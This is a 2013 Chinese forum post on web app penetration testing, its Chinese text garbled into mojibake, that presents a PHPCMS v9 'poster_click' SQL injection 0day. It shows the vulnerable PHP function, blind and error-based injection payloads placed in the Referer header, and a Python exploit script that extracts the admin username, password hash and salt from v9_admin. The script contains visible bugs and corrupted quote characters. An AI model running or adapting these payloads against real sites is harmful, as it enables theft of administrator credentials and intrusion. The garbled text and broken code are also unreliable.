��̳ › web app��͸����::��Web App penetration testing�� › phpcms post_clickע��0day���ô���

admin ������ 2013-1-11 21:01:00

phpcms post_clickע��0day���ô���

���˷ų���phpcmsv9��0day,����ʱд�˸����ô���,����ע�������������ʽ:

���⺯��\phpcms\modules\poster\index.php

public function poster_click() {
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
$r = $this->db->get_one(array('id'=>$id));
if (!is_array($r) && empty($r)) return false;
$ip_area = pc_base::load_sys_class('ip_area');
$ip = ip();
$area = $ip_area->get($ip);
$username = param::get_cookie('username') ? param::get_cookie('username') : '';
if($id) {
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
}
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
$setting = string2array($r['setting']);
if (count($setting)==1) {
$url = $setting['1']['linkurl'];
} else {
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
}
header('Location: '.$url);
}



���÷�ʽ��

1�����Բ���äע����ַ���

referer:1��,(select password from v9_admin where userid=1 substr(password,4)=��xxoo��),��1��)#

ͨ������ҳ�棬�������һ�����½������ֶΡ�

2�������ǻ���д�ģ����ָ����ˣ�

1��,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),��1��)#

�˷����DZ���ע���ַ���ԭ���Բ顣



����:

#!/usr/bin/env python
import httplib,sys,re

def attack():
print ��Code by Pax.Mac Team conqu3r!��
print ��Welcome to our zone!!!��
url=sys.argv
paths=sys.argv
conn = httplib.HTTPConnection(url)
i_headers = {��User-Agent��: ��Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5��,
��Accept��: ��text/plain��,
��Referer��: ��1��,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),��1��)#��}
conn.request(��GET��, paths+��/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2��, headers = i_headers)
r1 = conn.getresponse()
datas=r1.read()
datas=re.findall(r��Duplicate entry \��\w+����, datas)
print datas
conn.close()
if __name__==��__main__��:
if len(sys.argv)<3:
print ��Code by Pax.Mac Team conqu3r��
print ��Usgae:��
print ��    phpcmsattack.py   www.paxmac.org /��
print ��    phpcmsataack.py   www.paxmac.org /phpcmsv9/��
sys.exit(1)
attack()

�鿴�����汾: phpcms post_clickע��0day���ô���